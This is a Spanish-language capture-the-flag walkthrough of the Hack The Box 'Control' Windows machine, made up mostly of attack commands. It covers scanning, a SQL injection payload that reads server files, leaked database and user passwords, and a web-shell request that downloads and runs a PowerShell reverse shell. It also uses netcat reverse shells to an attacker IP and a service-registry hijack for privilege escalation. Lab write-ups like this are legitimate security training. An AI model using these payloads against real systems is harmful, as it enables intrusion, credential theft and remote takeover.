Cu3rv0x
Control

Control


HTB Windows

nmap -A -p- -oA output 10.129.1.248 —min-rate=10000 —script=vuln —script-timeout=15 -v

nmap -sC -sV -O -p- -oA active 10.129.1.248

nmap -sU -O -p- -oA active-udp 10.129.1.248

nikto -h 10.129.1.248:80

wfuzz -c -t 400 —hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.129.1.248/FUZZ

ssh_command.

ssh_command.

ssh_command.

ssh_command.

whatweb 10.129.1.248

ssh_command.

ssh_command.

http://10.129.1.248

ssh_command.

http://10.129.1.248/admin

ssh_command.

ssh_command.

Proxy->Options->Miscellaneous Escoger Dont send items to Proxy history or live tasks

ssh_command.

Target->Scope->Include in scope Le damos click a Add y agregamos http://10.129.1.248

ssh_command.

Proxy->Options-> Match and Replace Le damos click a Add y introducimos X-Forwarded-For:192.168.4.28 en Replace

ssh_command.

productName=p’ UNION SELECT TO_BASE64(LOAD_FILE(‘C:\inetpub\wwwroot\admin.php’)),2,3,4,5,6— -

ssh_command.

Copiamos el resultado y lo ponemos en "" en el comando de abajo un archivo php

echo -n "" | base64 > admin.php

hacemos lo mismo con database.php

ssh_command.

Y vemos las credenciales de mariadb

ssh_command.

nombre bd: warehouse usuariodb: manager password:l3tm3!n

ssh_command.

ssh_command.

ssh_command.

Hacemos un git clone Y modificamos la ultima fila del script Invoke-ConPtyShell.ps1 para que haga un reverse shell a la maquina atacante.

git clone https://github.com/antonioCoco/ConPtyShell

cd ConPtyShell

vim Invoke-ConPtyShell

ssh_command.

http://10.129.1.248/uploads/revshell.php?cmd=powershell IEX(New-Object Net.WebCllient).downloadString(‘http://10.10.14.125/Invoke-ConPtyShell.ps1’)

python3 -m http.server 80

ssh_command.

Empezamos con el reverse shell.

ssh_command.

cd C:\Windows\Temp\privesc

locate nc.exe

python3 -m http.server 80

ssh_command.

python3 /opt/impacket/examples/smbserver.py smbFolder $(pwd) -smbsupport -username cu3rv0x -password password123

ssh_command.

net use x: \10.10.14.105\smbFolder /user:cu3rv0x password123

ssh_command.

copy x:\nc.exe nc.exe

ssh_command.

cp nc.exe C:\Windows\System32\spool\drivers\color\nc.exe

ssh_command.

ssh_command.

$user = ‘fidelity\hector’

$password = ‘l33th4x0rhector’

$secpw = ConvertTo-SecureString $password -AsPlainText -Force

$cred = New-Object System.Management.Automation.PSCredential $user,$secpw

Invoke-Command -ComputerName localhost -Cred $cred -ScriptBlock {C:\Windows\System32\spool\drivers\color\nc.exe -e cmd 10.10.14.105 443}

ssh_command.

whoami /priv

ssh_command.

cp WinPEASany.exe ContPyShell

cd ContPyshell

python3 -m http.server 80

ssh_command.

net use y: \10.10.14.105\smbFolder /user:cu3rv0x password123

ssh_command.

copy y:\winPEASany.exe winpeas.exe

ssh_command.

Vemos uno de los servicios que estan parados como seclogon

ssh_command.

sc query seclogon

ssh_command.

reg query “HKLM\system\currentcontrolset\services\seclogon”

ssh_command.

reg add “HKLM\system\currentcontrolset\services\seclogon” /t REG_EXPAND_SZ /v ImagePath /d “C:\Windows\System32\spool\drivers\color\nc.exe -e cmd 10.10.14.105 443” /f

nc lvnp 443

ssh_command.

© 2025 Cu3rv0x